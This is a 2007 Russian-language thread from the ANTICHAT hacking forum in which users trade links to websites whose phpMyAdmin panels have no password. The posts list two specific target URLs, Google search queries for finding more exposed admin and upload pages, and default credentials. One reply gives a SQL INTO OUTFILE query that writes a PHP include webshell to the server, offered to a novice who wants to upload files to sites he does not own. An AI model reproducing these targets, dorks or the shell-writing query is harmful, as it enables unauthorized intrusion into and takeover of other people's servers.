HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Сайты с открытыми админками
  #1  
Старый 09.05.2007, 14:28
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами: 10016425

Репутация: 1257


Lightbulb Сайты с открытыми админками

Ненашел похожей темы и решл создать. есть сайты админы которых полные ламеры и незащищают админки паролями. Предлагаю в этой теме давать ссылки на на сайты этих типов.

Цитата:
http://85.114.241.23/phpmyadmin/server_status.php?lang=ru-win1251&server=1
Цитата:
http://mazdie.tushino.com/phpMyAdmin/main.php?lang=ru-win1251&server=1
 
Ответить с цитированием

  #2  
Старый 09.05.2007, 14:38
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

inurl:/phpMyAdmin/main.php

Вот тебе и список.
 
Ответить с цитированием

  #3  
Старый 09.05.2007, 14:50
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами: 10016425

Репутация: 1257


По умолчанию

Цитата:
inurl:/phpMyAdmin/main.php

Вот тебе и список.
невсегда так.
иногда нужны более извращённые методы
 
Ответить с цитированием

  #4  
Старый 09.05.2007, 16:37
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
С нами: 10533245

Репутация: 773


По умолчанию

inurl:main.php Welcome to phpMyAdmin
 
Ответить с цитированием

  #5  
Старый 09.05.2007, 17:39
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
С нами: 10038327

Репутация: 251


По умолчанию

Можно попробовать поискать /Ftp и /uploads , например, бывает что есть обычная html страничка с формой для отправки файла на сервер. Способ 2 нахождения админки( 5-8%)
По дефолту стоит пароль и логин admin и т.п. Ну и оськомерц там вроде админка иногда без пасса или .htpasswd. Запрос для upload filetype:html inurl:uploads site:com!
 
Ответить с цитированием

  #6  
Старый 14.05.2007, 09:03
BromTyZ
Новичок
Регистрация: 18.03.2007
Сообщений: 7
С нами: 10078481

Репутация: 8
По умолчанию

http://forum.antichat.ru/thread40031.html
Заходим суда, тут сканер таких дир!
 
Ответить с цитированием

  #7  
Старый 14.05.2007, 20:00
PahaN33
Новичок
Регистрация: 05.04.2007
Сообщений: 11
С нами: 10052488

Репутация: 0
По умолчанию

обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер... ((( оч прошу помогите

Последний раз редактировалось _Pantera_; 14.05.2007 в 22:54..
 
Ответить с цитированием

  #8  
Старый 15.05.2007, 00:24
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
С нами: 10038327

Репутация: 251


По умолчанию

Вообще долго рассказывать, но например есть у тебя доступ в phpmyadmin(если есть базы). Изучаешь структуру баз(залей дамп всей или части базы на хард), затем можно просто либо проинклудить определенный параметр в таблицы определенной базы (смотри тему phpbb) либо создать файл(твой шелл), также если данная база, которую ты решил изучить имеет характер Скрипт-Галерея или какой-либо upload файлов различных расширений , что мешает добавить тот же *.php формат, дело вкуса! Удачи!
 
Ответить с цитированием

  #9  
Старый 15.05.2007, 00:40
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
С нами: 10663526

Репутация: 715
По умолчанию

Цитата:
обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер... ((( оч прошу помогите
если есть права, выполняй запрос:
Код:
select '<?include($_GET[bravo])?>' from table into outfile '/patch/to/file.php';
 
Ответить с цитированием

  #10  
Старый 17.05.2007, 21:45
PahaN33
Новичок
Регистрация: 05.04.2007
Сообщений: 11
С нами: 10052488

Репутация: 0
По умолчанию

2 p-range

блин запрос выполняеться, но пишет что неможет создать файл.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сайты зомби Micr0b Уязвимости 25 20.07.2007 18:36
Сайты российских компаний признаны худшими в Европе -Concord- Мировые новости. Обсуждения. 10 29.11.2006 04:56
Опасные сайты Dracula4ever Мировые новости. Обсуждения. 2 28.05.2006 16:11
В 2005 году число dDoS-атак на web сайты возросло на 679% dinar_007 Мировые новости. Обсуждения. 0 02.03.2006 19:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...